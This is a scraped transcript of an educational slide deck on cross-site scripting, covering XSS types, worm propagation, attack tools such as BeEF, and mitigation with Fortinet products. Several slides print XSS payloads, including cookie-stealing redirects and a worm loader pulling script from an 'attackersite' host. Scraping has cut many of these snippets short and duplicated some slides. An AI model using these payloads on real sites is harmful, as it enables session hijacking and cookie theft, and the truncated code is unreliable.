Presentation is loading. Please wait.

Presentation is loading. Please wait.

XSS 101 Jason Clark 12/20.

Published byAda Chase Modified over 7 years ago

Similar presentations

Presentation on theme: "XSS 101 Jason Clark 12/20."— Presentation transcript:

1 XSS 101 Jason Clark 12/20

2 XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)

3 XSS Explained Web app vulnerability that allows code injection and cross site commands Java, php, cgi, asp, html, dhtml i.e. JavaScript provides the ability to create an iframe within a site thus allowing cross site commands Attack takes advantage of the way HTML code is interpreted by browser Majority of sites do not filter user input i.e. encoding ‘spaces’, #, <, >, XSS characters such as ; “ { (within <script tags) Typically involves “social engineering” Spoofed with encoded malicious URL XSS security is commonly overlooked due to lack of impact on Server XSS can be completely transparent to client Common and evasive attack due to client side vulnerability i.e. does not directly attack vulnerable web server

4 XSS Explained Myths XSS always involves “crossing sites”
i.e. web defacement, crafted URLs i.e. iframes populated with legit websites User needs to actively select link or URL XSS attacks can be exploited via HTML s, message boards, guestbooks... Using ‘onmouseover’ users only need to move the mouse over an active link <a onmouseover="alert('testing');">XSS</a> Using window.onload scripts may be executed by simply viewing an or web page <a href=" window.onload="alert(‘document.cookie');“>cnn.com</a> <script>document.location="

5 XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)

6 DOM Based Document Object Model DOM Based XSS
API which defines how documents are structured and accessed i.e. allows XML to be presented as a document on various systems Defines cross domain controls (scripts may not be run across domains, except local zone) DOM Based XSS Code is not submitted to web server (in most cases) RSS pages, InetE local pages, Also referred to as client-side XSS Bypasses client-side sandbox Difficult to detect (and secure)

7 DOM Based Example Attacker chooses a vulnerable web page on a victim host IE7 navcancl.htm design flaw Attacker crafts a link which exploits navcancl.htm res://ieframe.dll/navcancl.htm# res://ieframe.dll/navcancl.htm# Or simply Note: all code after the fragment ‘#’ does not get submitted to server XSS’d! - Attacker now has the ability to execute arbitrary code on behalf of user

8 DOM Based Example Attacker chooses a vulnerable web page on a victim host IE7 navcancl.htm design flaw Attacker crafts a link which exploits navcancl.htm res://ieframe.dll/navcancl.htm# res://ieframe.dll/navcancl.htm# Or simply Note: all code after the fragment ‘#’ does not get submitted to server XSS’d! - Attacker now has the ability to execute arbitrary code on behalf of user

9 Non-Persistent XSS non-persistent Most common XSS attack
Attacker typically needs to supply crafted URL to victim Client data is processed by server-side scripting i.e. server embeds <script> to web page which is executed by client browser Vulnerable pages will display data without encoding HTML or filtering i.e. search engines which display key word search back to user Search engines, forms…

10 Non-Persistent XSS Example
Attacker determines vulnerable non-persistent site <script>alert('testing');</script> <a onmouseover="alert('testing');">XSS</a> Attacker crafts a malicious link to site containing instruction script Malicious link is encoded to look “friendly” Malicious link is sent to end user via with intriguing title Depending on end user security settings user either clicks on link or “auto load” Web server/application executes malicious javascript Stolen cookies Session hijacking Attacker essentially has “rights” of victim

11 Non-Persistent XSS Example
Attacker determines vulnerable non-persistent site <script alert(XSS)</script> Attacker crafts a malicious link to site containing instruction script Malicious link is encoded to look “friendly” Malicious link is sent to end user via with intriguing title Depending on end user security settings user either clicks on link or “auto load” Web server/application executes malicious javascript Stolen cookies Session hijacking Attacker essentially has “rights” of victim

12 Persistent XSS Persistent
Most devastating and furthest reaching attack Typically exploited by allowed (unfiltered) HTML injections Similar to non-persistant XSS though no need to provide crafted URL to victim Unlimited code execution Vulnerable message board would typically allow all html tags User data is stored in a web db or file system i.e guest books, messages boards w/o encoding, May be used to distribute XSS Viruses

13 Persistent XSS Example
Attacker determines site vulnerable to Persistent XSS Ideally attacker is looking for a high traffic message board Attacker posts a controversial message with expectation of multiple views i.e. “Fortinet announces S1 filing click here to read more” Or Attacker uses window.onload function so script is executed on view Victim selects link in message board post, or simply views page with active code XSS’d! – at this point various payload functions can be performed Cookie stealing, Trojan download, key logging, XSS Worm propagation <img src=“javascript:document.location(‘ . (document.cookie));”>

14 XSS Worms SCRAPE Utilize external engines to identify victims such as xssed.com or search engines Attacker creates dynamic scripts which parses xssed.com, extracts attack vector info, then propagates XSS worm via victim sites SPECIFIC Typically targets specific victims Purpose is to remain on the target propagating within a single server or app i.e. Samy XSS worm (MySpace XSS worm) GENERIC No specific target application Exploits generalized variables Example

15 XSS Worms Example Attacker posts a link to a vulnerable high traffic web forum (say ) Java or php scripts utilizes hidden iframe which executes <script src=attackersite/worm.js</script> Script contains target iframe of /8 as well as get_random for running through remainder of subnet (exploiting vulnerable sites) Note: there is a little more to this such as + address +”/index.php Random address is inserted in address and index.php will (hopefully) be resident At this point each time the page is viewed script is executed which in turn runs through entire class A subnet prorogating XSS worm/virus

16 XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)

17 Determining Vulnerable Sites
Public Sites Scanners Nikto Too many too mention… Scripts Use on search boxes, forms, web accounts, bank logins <script>alert(‘xsstesting');</script> FireFox XSS ME Tamper Data Many more…

18 XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples Mitigating XSS (Basics and Fortinet)

19 What now What can I do with XSS? Tools Cookie theft
Session riding/hijacking (CSRF) False advertisements/Free advertising Hit stealing Identity theft Web page defacement XSS worm propagation Tools BeEF XSS-Proxy Backframe Java, php, cgi, html, etc

20 XSS Explained XSS Types XSS “Fingerprinting” What can you do with XSS? XSS Examples/Tools Mitigating XSS (Basics and Fortinet)

21 XSS Examples and Tools Scripts Tools
<script>document.location=" <script> alert(document.cookie) </script> <a <a href="javascript: src=" res://ieframe.dll/navcancl.htm# about:cancel# <iframe src= Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…

22 XSS Examples and Tools Scripts Tools
<script>document.location=" <script> alert(document.cookie) </script> <a <a href="javascript: src=" res://ieframe.dll/navcancl.htm# about:cancel# <iframe src= Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…

23 XSS Examples and Tools Scripts Tools
<script>document.location=" <script> alert(document.cookie) </script> <a <a href="javascript: src=" res://ieframe.dll/navcancl.htm# about:cancel# <iframe src= Tools BeEF XSS-Proxy Backframe Java, perl, cgi, html, etc…

24 XSS Explained XSS Types Determining Vulnerable Sites What can you do with XSS? XSS Examples/Tools Mitigating XSS (Basics and Fortinet)

25 Mitigating XSS Input Filtering
Allow only expected/necessary user input Web Application Firewalls – Feature Request  Fortigate! Antivirus – known XSS worms, phishing s Antispam – Potential phishing s JavaScript control – block <script> functions Fortiguard Web Filtering – block known malicious sites Intrusion Prevention XSS Signatures Custom signatures for user filtering End user controls Enforcing browser security Patch management Keeping browser /OS patches up-to-date Forticlient! – web, av, ips, antispam, anti-grayware

26 The End Disclaimer: This presentation is meant to educate the security professional in hopes of creating awareness of Cross Site Scripting. I am not responsible for any scripts contained or the use thereof within this documentation

Download ppt "XSS 101 Jason Clark 12/20."

Similar presentations

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.

Cross-Site Scripting Issues and Defenses Ed Skoudis Predictive Systems © 2002, Predictive Systems.
Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.

Cross-Site Scripting CSCD 498/539 Secure Coding Principles Amazing Legion of Fuzzy Backdoor Intruder Worms Bryan Smith Allen Greaves Zach Moore Rebecca.
Past, Present and Future By Eoin Keary and Jim Manico

Past, Present and Future By Eoin Keary and Jim Manico
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.

HI-TEC 2011 SQL Injection. Client’s Browser HTTP or HTTPS Web Server Apache or IIS HTML Forms CGI Scripts Database SQL Server or Oracle or MySQL ODBC.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
Team Members: Brad Stancel,

Team Members: Brad Stancel,
Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.

Cross Site Scripting a.k.a. XSS Szymon Siewior. Disclaimer Everything that will be shown, was created for strictly educational purposes. You may reuse.
CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.

CMSC 414 Computer and Network Security Lecture 24 Jonathan Katz.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
March Intensive: XSS Exploits

March Intensive: XSS Exploits
CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?

CROSS SITE SCRIPTING..! (XSS). Overview What is XSS? Types of XSS Real world Example Impact of XSS How to protect against XSS?
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
Copyright© 2002 Avaya Inc. All rights reserved Advanced Cross Site Scripting Evil XSS Anton Rager.

Copyright© 2002 Avaya Inc. All rights reserved Advanced Cross Site Scripting Evil XSS Anton Rager.
Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report 2014 https://info.cenzic.com/2013-Application-Security-Trends-Report.html.

Cosc 4765 Server side Web security. Web security issues From Cenzic Vulnerability report
Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Cross-Site Scripting Vulnerabilities Adam Doupé 11/24/2014.

Similar presentations

Ads by Google